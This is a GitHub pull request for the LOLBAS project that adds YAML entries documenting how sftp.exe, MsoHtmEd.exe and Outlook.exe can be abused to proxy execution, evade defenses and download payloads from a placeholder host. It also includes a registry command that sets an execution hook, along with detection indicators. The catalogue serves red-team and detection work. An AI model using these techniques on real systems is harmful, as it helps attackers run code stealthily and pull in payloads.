Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add msohtmed.exe as an executor #290

Open
wants to merge 10 commits into
base: master
Choose a base branch
from
Open

Add msohtmed.exe as an executor #290

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
10 commits
Select commit Hold shift + click to select a range
860246f
Add sftp.exe executor
C-h4ck-0 Nov 6, 2022
da86328
Rename sftp to sftp.yml
C-h4ck-0 Nov 6, 2022
8fafb02
fix yaml-lint syntax error
C-h4ck-0 Nov 6, 2022
0c0e242
Add Outlook.exe downloader
C-h4ck-0 Nov 8, 2022
f3329c0
Merge pull request #1 from LOLBAS-Project/master
C-h4ck-0 Nov 14, 2022
e803bc7
Update sftp.yml
C-h4ck-0 Nov 14, 2022
5f14405
Merge pull request #3 from LOLBAS-Project/master
C-h4ck-0 Apr 30, 2023
7e1d516
Merge pull request #4 from LOLBAS-Project/master
C-h4ck-0 May 7, 2023
9dba437
Update MsoHtmEd.yml
C-h4ck-0 May 7, 2023
7cdc926
Update MsoHtmEd.yml
C-h4ck-0 May 7, 2023
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
35 changes: 35 additions & 0 deletions yml/OSBinaries/sftp.yml
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,35 @@
---
Name: sftp.exe
Description: SSH File Transfer Protocol
Author: Nir Chako
Created: 2022-11-06
Commands:
- Command: "sftp -D c:\\windows\\system32\\notepad.exe"
Description: Execute notepad.exe with sftp.exe as parent process
Usecase: Use sftp.exe as a proxy binary to evade defensive counter-measures
Category: Execute
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10, Windows 11
- Command: "sftp -S c:\\windows\\system32\\notepad.exe localhost"
Description: Execute notepad.exe with sftp.exe as parent process
Usecase: Use sftp.exe as a proxy binary to evade defensive counter-measures
Category: Execute
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10, Windows 11
- Command: "sftp <ftp_user>@<ftp_Server_ip>:<path_of_file_to_download> <path_to_save_file>"
Description: Download file with sftp.exe from an FTP server
Usecase: Use sftp.exe as a proxy binary to evade defensive counter-measures. If needed, you will be asked to submit a password for the sFTP session.
Category: Download
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: c:\windows\system32\OpenSSH\sftp.exe
Detection:
- IOC: sftp.exe spawning unexpected processes
- IOC: Suspicious sFTP internet/network traffic
Acknowledgement:
- Person: 'Nir Chako (Pentera)'
Handle: '@C_h4ck_0'
7 changes: 7 additions & 0 deletions yml/OtherMSBinaries/MsoHtmEd.yml
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -4,6 +4,13 @@ Description: Microsoft Office component
Author: Nir Chako
Created: 2022-07-24
Commands:
- Command: MsoHtmEd.exe https://any-valid-link-to-download-any-html-file-from.com
Description: Execute a command line from the registry
Usecase: Set this registry key with the desired commaned you want to trigger (this example executes calc.exe) - reg add "HKCU\SOFTWARE\Microsoft\Shared\HTML\Default Editor\shell\edit\command" /f /t REG_SZ /d "calc.exe"
Category: Execute
Privileges: User
MitreID: T1218
OperatingSystem: Windows 10, Windows 11
- Command: MsoHtmEd.exe https://example.com/payload
Description: Downloads payload from remote server
Usecase: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
Expand Down
34 changes: 34 additions & 0 deletions yml/OtherMSBinaries/Outlook.yml
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,34 @@
---
Name: Outlook.exe
Description: Microsoft Office component
Author: Nir Chako
Created: 2022-11-08
Commands:
- Command: Outlook.exe https://example.com/payload
Description: Downloads payload from remote server
Usecase: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Outlook.exe
- Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Outlook.exe
- Path: C:\Program Files (x86)\Microsoft Office\Office16\Outlook.exe
- Path: C:\Program Files\Microsoft Office\Office16\Outlook.exe
- Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\Outlook.exe
- Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\Outlook.exe
- Path: C:\Program Files (x86)\Microsoft Office\Office15\Outlook.exe
- Path: C:\Program Files\Microsoft Office\Office15\Outlook.exe
- Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\Outlook.exe
- Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\Outlook.exe
- Path: C:\Program Files (x86)\Microsoft Office\Office14\Outlook.exe
- Path: C:\Program Files\Microsoft Office\Office14\Outlook.exe
- Path: C:\Program Files (x86)\Microsoft Office\Office12\Outlook.exe
- Path: C:\Program Files\Microsoft Office\Office12\Outlook.exe
- Path: C:\Program Files\Microsoft Office\Office12\Outlook.exe
Detection:
- IOC: Suspicious Office application internet/network traffic
Acknowledgement:
- Person: Nir Chako (Pentera)
Handle: '@C_h4ck_0'